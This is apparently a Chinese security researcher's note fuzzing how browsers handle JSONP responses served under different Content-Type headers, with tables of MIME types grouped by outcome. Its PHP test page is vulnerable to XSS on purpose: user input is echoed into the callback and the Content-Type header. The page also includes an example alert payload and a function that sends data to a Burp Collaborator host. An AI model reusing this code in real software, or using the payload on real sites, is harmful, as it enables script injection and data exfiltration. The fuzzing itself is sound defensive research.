JSONP Content-Type 简单Fuzz

列表

本页目录
  1. 测试代码
  2. 测试结果

测试代码

// http://10.211.55.8/jsonx.php?callback=%3Cscript%3Ealert(1)%3C/script%3E&content_type=text/vnd.wap.wml
<?php
echo "<script>function test(cc){location='http://m2pybxdae******9m4fff8dwlnrdf2.burpcollaborator.net/payload='+cc;}</script>";
$content_type=$_GET['content_type'];
//print "Use Content-type '".$content_type."'\n";
header("X-XSS-Protection: 0;");
header("Content-Type: ".$content_type);
$callback = $_GET['callback'];
print $callback . '({"id" : "1","name" : "Sariel.D"});';
?>

测试结果

  1. 支持xss

列表

NameTemplateReference
htmltext/html[W3C][Robin_Berjon]

效果

JSONP Content-Type 简单Fuzz · 图示

  1. 返回内容

列表

NameTemplateReference
ecmascriptapplication/ecmascript[RFC4329]
javascriptapplication/javascript[RFC4329]
jsonapplication/json[RFC8259]
1d-interleaved-parityfectext/1d-interleaved-parityfec[RFC6015]
cache-manifesttext/cache-manifest[W3C][Robin_Berjon]
csstext/css[RFC2318]
csv-schematext/csv-schema[National_Archives_UK][David_Underdown]
dnstext/dns[RFC4027]
ecmascript - OBSOLETED in favor of application/ecmascripttext/ecmascript[RFC4329]
encaprtptext/encaprtp[RFC6849]
exampletext/example[RFC4735]
fwdredtext/fwdred[RFC6354]
grammar-ref-listtext/grammar-ref-list[RFC6787]
javascript - OBSOLETED in favor of application/javascripttext/javascript[RFC4329]
jcr-cndtext/jcr-cnd[Peeter_Piegaze]
markdowntext/markdown[RFC7763]
n3text/n3[W3C][Eric_Prudhommeaux]
parameterstext/parameters[RFC7826]
provenance-notationtext/provenance-notation[W3C][Ivan_Herman]
prs.fallenstein.rsttext/prs.fallenstein.rst[Benja_Fallenstein]
prs.lines.tagtext/prs.lines.tag[Benja_Fallenstein]
text/prs.prop.logictext/prs.prop.logic[Hans-Dieter_A._Hiep]
raptorfectext/raptorfec[RFC6682]
REDtext/RED[RFC4102]
rfc822-headerstext/rfc822-headers[RFC6522]
rtp-enc-aescm128text/rtp-enc-aescm128[_3GPP]
rtploopbacktext/rtploopback[RFC6849]
rtxtext/rtx[RFC4588]
sgmltext/sgml[RFC1874]
stringstext/strings[IEEE-ISTO-PWG-PPP]
t140text/t140[RFC4103]
trofftext/troff[RFC4263]
turtletext/turtle[W3C][Eric_Prudhommeaux]
ulpfectext/ulpfec[RFC5109]
uri-listtext/uri-list[RFC2483]
vnd.atext/vnd.a[Regis_Dehoux]
vnd.abctext/vnd.abc[Steve_Allen]
vnd.ascii-arttext/vnd.ascii-art[Kim_Scarborough]
vnd.curltext/vnd.curl[Robert_Byrnes]
vnd.debian.copyrighttext/vnd.debian.copyright[Charles_Plessy]
vnd.DMClientScripttext/vnd.DMClientScript[Dan_Bradley]
vnd.dvb.subtitletext/vnd.dvb.subtitle[Peter_Siebert][Michael_Lagally]
vnd.esmertec.theme-descriptortext/vnd.esmertec.theme-descriptor[Stefan_Eilemann]
vnd.flytext/vnd.fly[John-Mark_Gurney]
vnd.fmi.flexstortext/vnd.fmi.flexstor[John-Mark_Gurney]
vnd.graphviztext/vnd.graphviz[John_Ellson]
vnd.hgltext/vnd.hgl[Heungsub_Lee]
vnd.in3d.3dmltext/vnd.in3d.3dml[Michael_Powers]
vnd.in3d.spottext/vnd.in3d.spot[Michael_Powers]
vnd.IPTC.NewsMLtext/vnd.IPTC.NewsML[IPTC]
vnd.IPTC.NITFtext/vnd.IPTC.NITF[IPTC]
vnd.latex-ztext/vnd.latex-z[Mikusiak_Lubos]
vnd.motorola.reflextext/vnd.motorola.reflex[Mark_Patton]
vnd.ms-mediapackagetext/vnd.ms-mediapackage[Jan_Nelson]
vnd.net2phone.commcenter.commandtext/vnd.net2phone.commcenter.command[Feiyu_Xie]
vnd.senx.warpscripttext/vnd.senx.warpscript[Pierre_Papin]
vnd.si.uricatalogue - OBSOLETED by requesttext/vnd.si.uricatalogue[Nicholas_Parks_Young]
vnd.trolltech.linguisttext/vnd.trolltech.linguist[David_Lee_Lambert]
vnd.wap.sitext/vnd.wap.si[WAP-Forum]
vnd.wap.wmltext/vnd.wap.wml[Peter_Stark]
vnd.wap.wmlscripttext/vnd.wap.wmlscript[Peter_Stark]

效果

JSONP Content-Type 简单Fuzz · 图示

  1. 返回内容但浏览器尝试解析导致异常

列表

NameTemplateReference
oggapplication/ogg[RFC5334][RFC7845]
pdfapplication/pdf[RFC8118]
xmlapplication/xml[RFC7303]
xmltext/xml[RFC7303]
mp4audio/mp4[RFC4337][RFC6381]
mpegaudio/mpeg[RFC3003]
oggaudio/ogg[RFC5334][RFC7845]
bmpimage/bmp[RFC7903]
pngimage/png[Glenn_Randers-Pehrson]
vnd.microsoft.iconimage/vnd.microsoft.icon[Simon_Butcher]
x-mixed-replacemultipart/x-mixed-replace[W3C][Robin_Berjon]

效果

JSONP Content-Type 简单Fuzz · 图示